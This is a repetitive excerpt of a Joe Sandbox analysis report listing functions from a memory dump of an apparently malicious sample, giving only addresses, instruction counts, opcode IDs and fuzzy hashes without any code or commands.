                                                                                                                • Snapshot File: hcaresult_25_2_66b0000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 48fcc1f4b7db575cf25022d04574f2bfb501710d1cffb40a5c251d7ad4fb0b75
                                                                                                                • Instruction ID: 916d73dc03464505c922228fa51855d6434f7ae706c9e3e46d5ad311a980fda2
                                                                                                                • Opcode Fuzzy Hash: 48fcc1f4b7db575cf25022d04574f2bfb501710d1cffb40a5c251d7ad4fb0b75
                                                                                                                • Instruction Fuzzy Hash: 7A61E271F004228BDF509A7EC884AAFBAD7AFC4620F15503AD80ADB3A0DE65DD4287C5
                                                                                                                Function 066B46D8 Relevance: .2, Instructions: 222COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.2495719821.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_2_66b0000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8e9bc35e7fbac9d6630245b9ae5f8ab4ba9f8d0eef28af4e8fe248c2d91f3fbb
                                                                                                                • Instruction ID: 5630ca1e7fb4ff91d56606c6aa99f10f84b66ee255b7dd38163fc58fb11fe643
                                                                                                                • Opcode Fuzzy Hash: 8e9bc35e7fbac9d6630245b9ae5f8ab4ba9f8d0eef28af4e8fe248c2d91f3fbb
                                                                                                                • Instruction Fuzzy Hash: 09913B30E10619CBDB60DF68C890BD9B7B1FF89310F208699D549AB356DB71AA85CB90
                                                                                                                Function 066B46F0 Relevance: .2, Instructions: 210COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.2495719821.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_2_66b0000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 95b29324d205cc3bd2202f42234d20e2ffd0717052a300d31adbb5fde5188550
                                                                                                                • Instruction ID: b21bd0c745740d111d6dd4c7b5fca87b794dc557b4d340f5ab2c98574e95857d
                                                                                                                • Opcode Fuzzy Hash: 95b29324d205cc3bd2202f42234d20e2ffd0717052a300d31adbb5fde5188550
                                                                                                                • Instruction Fuzzy Hash: 71911830E1061ACBDB60DF68C890BDDB7B1FF89310F208699D549AB345DB71AA85CF90
                                                                                                                Function 066BFB58 Relevance: .2, Instructions: 170COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.2495719821.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_2_66b0000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 98dec1bb6c4215707340073cee0d42d2ca809673c89771992e62d34b75eccc01
                                                                                                                • Instruction ID: e277fd7021e3b3fdd40d48f972d3f4008db49f4cd7d1fea93b028155c5f5c35b
                                                                                                                • Opcode Fuzzy Hash: 98dec1bb6c4215707340073cee0d42d2ca809673c89771992e62d34b75eccc01
                                                                                                                • Instruction Fuzzy Hash: E751E234B20145CFFF646668DD64BAF365AE789340F20552AE50AD37A9CA38CCC143A2
                                                                                                                Function 066BFB68 Relevance: .2, Instructions: 163COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.2495719821.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_2_66b0000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 23351ec0dc7d6b8cb6bdcf18ce105348723e5a521c8a00c78453a23e2a93ee27
                                                                                                                • Instruction ID: d6ae7ee8d1577c865f7f702d50d06615e9be363ce2b805d9ba70fc2e22b3dfa0
                                                                                                                • Opcode Fuzzy Hash: 23351ec0dc7d6b8cb6bdcf18ce105348723e5a521c8a00c78453a23e2a93ee27
                                                                                                                • Instruction Fuzzy Hash: EE51C134B20105DBFF646668DD64B6F365EE789750F20542AE50AD37A9CA78CCC143E2
                                                                                                                Function 066B9241 Relevance: .2, Instructions: 161COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.2495719821.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_2_66b0000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a8c69fad23b7e6197d7c6ef3e1201ddb9863ba0ae8b81e8e6cf6c1e5a56eddbd
                                                                                                                • Instruction ID: 7102d5206364c9fc287f37a203562bcc36cd777b8ec29fe1454ac0a2e63fc539
                                                                                                                • Opcode Fuzzy Hash: a8c69fad23b7e6197d7c6ef3e1201ddb9863ba0ae8b81e8e6cf6c1e5a56eddbd
                                                                                                                • Instruction Fuzzy Hash: E9513C30B11246DFDB94EB74D990BAE73F6EF89300F10856AC90ADB744EA709C52CB95
                                                                                                                Function 066BF2C1 Relevance: .1, Instructions: 55COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.2495719821.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_2_66b0000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 70e3e0b12f4ff9b775f8e64c01806fb4492f47f0cebd392089a7ba718a7a1756
                                                                                                                • Instruction ID: 52812e0f8b0ba418c2ab72801ce9da203d88dc9445aacef8dabc07557b5551e4
                                                                                                                • Opcode Fuzzy Hash: 70e3e0b12f4ff9b775f8e64c01806fb4492f47f0cebd392089a7ba718a7a1756
                                                                                                                • Instruction Fuzzy Hash: 96012831B045414FCB719ABCE894B6EB7D6DBCA714F145429E90AC7351DA35DC428386
                                                                                                                Function 066BF2D0 Relevance: .0, Instructions: 49COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.2495719821.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_2_66b0000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2598ce51fce8ee14dee6ec89b987360d60ff101085893cafff6dd834eb150cab
                                                                                                                • Instruction ID: 2aaf8e02ad9c19794839035a0eec3ab9155baf4e9f14ffd98d2457a4ef79458f
                                                                                                                • Opcode Fuzzy Hash: 2598ce51fce8ee14dee6ec89b987360d60ff101085893cafff6dd834eb150cab
                                                                                                                • Instruction Fuzzy Hash: 65018135B005114BDBA495ADE85476EB3DADBC9710F109439E60AC7350EA35DC824385